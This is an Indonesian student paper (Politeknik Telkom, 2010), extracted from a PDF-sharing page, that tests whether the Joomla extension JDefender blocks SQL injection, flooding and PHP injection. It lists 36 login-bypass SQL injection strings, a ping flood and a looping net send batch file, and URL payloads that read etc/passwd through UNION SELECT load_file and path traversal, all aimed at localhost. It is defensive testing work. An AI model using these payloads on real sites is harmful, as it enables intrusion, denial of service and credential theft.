kasus scurity
-
Upload
dian-parikesit -
Category
Documents
-
view
32 -
download
0
Transcript of kasus scurity
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 1/6
PENGUJIAN KEAMANAN JDEFENDER UNTUK MENANGKAL SERANGAN SQL
INJECTON, FLOODING DAN PHP INJECTION PADA SEBUAH WEB-SITEBERBASIS JOOMLA
Hari Purnanto [email protected]
Ir. Nina Hendrarini, MT. [email protected]
Simon Siregar, Ssi. MT. [email protected]
Program Studi Teknik KomputerPoliteknik Telkom Bandung
2010
ABSTRAK
Dalam membangun sebuah web-site diperlukan adanya keamanan atau security.
Keamanan merupakan komponen paling penting dalam jaringan komputer, hal ini harus
menjadi prioritas utama bagi para administrator web-site agar tidak di hack oleh para cracker .Berbicara mengenai keamanan web-site, salah satu keamanan yang Penulis gunakan dalam
Proyek Akhir ini adalah JDefender . Keamanan ini terdiri dari dua file, yaitu component dan bot
atau plugin.
Dari kedua file JDefender ini masing-masing diantaranya mempunyai fungsi.
Component berisi script program utama filtering, berfungsi untuk melindungi suatu web-site
dari serangan cracker . Sedangkan bot atau plugin berfungsi untuk mengecek atau memeriksa
apakah script yang ada dalam plugin ini sama dengan script yang ada pada file component ,sehingga script yang ada dalam plugin ini mirip dengan script yang ada dalam file component .
Apabila script yang ada dalam bot atau plugin ini dihapus atau diberi tanda komentar php, maka service plugin dari keamanan JDefender ini menjadi tidak berfungsi walaupunservice di administrator -nya diaktifkan atau di enable. Cara ini digunakan untuk melumpuhkan
keamanan JDefender . Untuk memulihkan kembali kembali JDefender , salah satu caranyaadalah dengan membuang atau mencabut tanda komentar php yang disisipkan kedalam source
code-nya.
Kata kunci : JDefender, Component, bot atau plugin dan Cracker
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 2/6
1. PENDAHULUAN
Seiring dengan makin
berkembangnya penggunaan internet ,pertukaran informasi dari berbagai belahan
dunia menjadi semakin cepat dan lancar.Isu ketidakamanan kemudian mencuat
karena terjadinya beberapa kasus, seperti
manipulasi data pada database danpencurian username dan password . Hal ini
juga terjadi pada web-site KPU ( Komisi
Pemilihan Umum ) indonesia pada tahun
2004, dimana isi dari web-site tersebutdiacak-acak oleh pihak yang tidak
bertanggungjawab. Sehingga data-data dantampilan dari web-site tersebut menjaditidak jelas dan kacau, hal ini dikarenakanbahwa administrator web-site tersebut
kurang memperhatikan mengenai masalah
keamanan.
Salah satu teknik untuk
menangkal serangan tersebut adalahdengan menggunakan keamanan
JDefender . Keamanan ini bekerja dengan
mendeteksi dan mengeblok dari setiapserangan yang masuk dari para cracker,
seperti Flood ( Banjir data di jaringan ),SQL Injection dan PHP Injection. JDefender dapat mengeblok ip address,
login dan memfilter string-sting yang
dianggap berbahaya dengan menggunakanregular expressions sehingga para cracker
tidak dapat masuk sebagai administrator
yang mana dapat melakukan pencurianusername dan pasword serta manipulasi
data pada database.
Keamanan JDefender iniselanjutnya akan mengirimkan email alerts
kepada administrator apabila telah
mendeteksi serangan yang masuk.
Pemberitahuan berupa pengiriman email
ini sangat penting, karena sebagai
konfirmasi kepada adminstrator web-site
agar dengan segera waspada dan tetap
siaga terhadap beberapa serangan
membahayakan yang masuk. Hal initerjadi apabila domain dari web-site telah
dihosting dan kalau belum dihosting tidak
akan terjadi pemberitahuan berupapengiriman email kepada administrator .
2. PERCOBAAN SERANGAN
2.1 SQL Injection
SQL Injection adalah teknik
untuk exploit aplikasi web memakai data
yang diberikan client dalam query SQL
tanpa menghilangkan karakter denganpotensi bahaya [5]. Berikut adalah contoh
sintaks sql injection yang diterapkan
melalui form login.
Tabel 2.1 Sintaks SQL Injection
No. Sintaks
1. ') or '1'='1--
2. or 1=1 –
3 ” or 1=1–
4. „ or „a‟=‟a
5. ” or “a”=”a
6. „) or (‟a‟=‟a
7. „ or 0=0 –
8. ” or 0=0 –
9. ” or “x”=”x
10. or 0=0 –
11 „ or 0=0 # 12 ” or 0=0 #
13. or 0=0 #
14. „ or „x‟=‟x
15. „) or (‟x‟=‟x
16. „ or 1=1--
17. „ or a=a–
18. “) or (”a”=”a
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 3/6
19. hi” or “a”=”a
20. hi” or 1=1 –
21. hi‟ or 1=1 – 22. hi‟ or „a‟=‟a
23. hi‟) or (‟a‟=‟a
24. hi”) or (”a”=”a
25. 1or 1=1
26. ') or ('1'='1--
27. 1 and 1=1
28. „ or „‟=‟
29. admin' --
30. admin' #
31. admin'/*
32. ' or 1=1# 33. ' or 1=1/*
34. ' having 1=1--
35. 1' or '1'='1
36. or1=1--
Dari sintaks sql injection di atas, apabila
dijalankan akan memunculkan pesan
“Incorrect Username or Password”.
Berarti penyerangan dengan metode query
sql injection ini tidak berhasil atau tidak
menemukan error pada database server
web-site tersebut.
2.2 FLOODING
Flooding adalah salah satu jenis
serangan di jaringan komputer yang
mengirimkan pesan – pesan dalam jumlahyang sangat besar ke host tertentu [3].
Macam – macam dari serangan flooding
adalah sebagai berikut :
2.2.1 Serangan dengan ICMP PING
Perintahnya adalah : ping 127.0.0.1 -t
Apabila serangan tersebut dijalankan, maka
komputer penyerang akan meminta request
kepada komputer korban atau server secaraterus menerus. Apabila hal ini segera tidak
ditangani dengan mengeblok ip address
komputer penyerang, komputer korban atauserver dapat hang atau mati karena tidak
mampu melayani request data yang
berlebihan.
2.2.2 Serangan dengan NET SEND
Perintahnya adalah dengan mengeklik
ganda file .bat -nya. Berikut adalah isi dari file.bat -nya :
net send 127.0.0.1
call serang.bat
File .bat di atas bernama serang.bat ,apabila file tersebut diklik ganda maka akan
merequest komputer tujuan atau server
secara terus menerus sampai komputertersebut hang atau mati. Syarat agar
serangan ini dapat berjalan adalah denganmengaktifkan service messenger di
komputer tujuan dan penyerang, hal inidilakukan untuk menyerang komputer
dengan ip address bukan localhost . Apabila
yang diserang adalah komputer tujuan ataulocalhost , maka service messenger ini tidak
perlu diaktifkan, karena tanpa diaktikan pun
serangan ini sudah dapat berjalan.
2.3 PHP INJECTION
PHP Injection adalah adalah
sebuah tindakan untuk cracking dengan
memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu
pengeksploitasian sebuah target dengan
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 4/6
media PHP Shell. Macam – macam dari
serangan ini adalah sebagai berikut :
2.3.1 Serangan dengan mencuri
password
Perintahnya adalah :
union+all+select+1,null,load_file('etc/pa
sswd'),4--
Dalam alamat url contoh serangan
lengkapnya adalah sebagai berikut :
http://localhost/joomla/index.php?option=c
om_content&task=view&id=19&Itemid=34+union+all+select+1,null,load_file('etc/
passwd'),4--
Apabila serangan di atas dijalankan, maka
password yang berada di database server
web-site atau komputer tujuan dapat
diambil atau diketahui dengan mudah olehpenyerang. Hal ini sangat berbahaya jika
administrator dari suatu web-site tidak memperhatikan tentang vulnerability dariweb-site-nya.
2.3.2 Serangan dengan mencuripassword dengan metode lain.
Perintahnya adalah :
http://localhost/joomla/index.php?option=c
om_content&task=view&id=19&Itemid=3
4 / passwd%00
Serangan di atas juga berbahaya, karena
apabila dijalankan password dari komputer
server atau tujuan dapat diketahui.
2.3.3 Serangan dengan mencuri passworddengan metode selain di atas
Perintahnya adalah :
/ etc/passwd
Dalam alamat url contoh serangan
lengkapnya adalah sebagai berikut :
http://localhost/joomla/index.php?option=co
m_content&task=view&id=19&Itemid=34 /e
tc/passwd
Serangan di atas apabila dijalankan di
alamat url, maka password dariadministrator dapat diketahui dengan
mudah.
3. HASIL PENGUJIAN
Setelah dilakukan pengujiandengan serangan sql injection, flooding dan
php injection terhadap sistem keamanan jdefender , bahwa jdefender terbukti kuat didalam menangani ketiga serangan di atas.
Hal ini terbukti dengan munculnya alert
atau warning di halaman web client atauhalaman web penyerang.
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 5/6
4. KESIMPULAN DAN SARAN
4.1 KESIMPULAN
Dari hasil implementasi analisisterhadap hasil pengujian sistem maka
didapatkan beberapa kesimpulan antara
lain:
1. Bahwa sistematika kerja jdefender
bekerja dengan mengeblok dari setiap
serangan yang masuk ke suatu web-site,baik itu serangan sql injection, flooding
dan php injection. Apabila serangantersebut telah terblok, maka jdefender
akan memunculkan warning atau alert
di halaman web client .
2. Setelah sistem keamanan jdfender diujidengan serangan sql injection, flooding
dan php injection terbukti bahwa jdefender memang kuat di dalam
menangkal serangan sql injection,
flooding dan php injection di atas.
4.2 SARAN
1. Salah – satu cara untuk mengembalikan JDefender menjadi kuat lagi adalah
dengan mencabut atau membuang tandakomentar php ( /* ) untuk tag pembuka
dan tanda ( */ ) untuk tag penutup.
Pencabutan tanda ini dilakukan dari sisiserver .
2. Salah – satu cara untuk bisa merubah password joomla adalah harus dari sisiserver . Hal ini dapat dilakukan dengan
jalan masuk ke phpmyadmin, ubah password md5 hash dan salt -nyadengan password yang kita inginkan
kemudian pilih drop-down md5
disebelah kiri password yang kita buat tadi
dan selanjutnya klik go.
5. REFERENSI
[1]. Cara Gampang Membuat Website
dengan Joomla untuk Pemula.
Jakarta: PT Elex Media Komputindo,
2008.
[2]. Justin. Clarke. ( 2009 ). SQL Injection
Attacks and Defense. [ Online ].
Available:http://www.flazx.com/ebook13483.ph
p [ April 15, 2010 ].
[3]. McClure. Stuart, Shah. Saumil, Shah.Shreeraj. ( 2002, Aug 8 ). Web
Hacking: Attacks and Defense. [
Online ]. Available :
http://www.flazx.com/ebook982.php [
Aug 15, 2010 ].
[4]. Network Security Courseware.
Bandung: Politeknik Telkom, 2009.
[5]. Shulman. Amichai. Traditional SQL
Injection Injection: The Wrong
Solution for the Right Problem. [Online ]. Available:
http://www.imperva.com/resources/A
dc/pdfs/Traditional_SQL_InjectionProtection_The_Wrong_Solution_for_the
_Right_Problem.pdf [ Jun 1, 2010 ].
[6].
Utdirartatmo. Firrar. Ancaman Internet Hacking dan Trik
Menanganinya. Yogyakarta: ANDI-
Offset, 2006.
5/16/2018 kasus scurity - slidepdf.com
http://slidepdf.com/reader/full/kasus-scurity 6/6
[7]. Romanov. Sergey. ”JDefender”.
Internet:
http://extensions.joomla.org/extensions/access-a-security/site-
security/11359, Mar 12, 2010 [ Jun
4, 2010 ].
[8]. Romanov. Sergey. “JDefender”.
Internet:
http://extensions.joomla.org/extensio
ns/owner/sergeyromanov [ Jun 5,
2010 ].
[9]. Shah. Saumil. "One-way Web
Hacking". Internet: http://net-square.com/papers/one_way/one_wa
y.html#4.0.3, Dec 8, 2003 [ Jun 5,2010 ].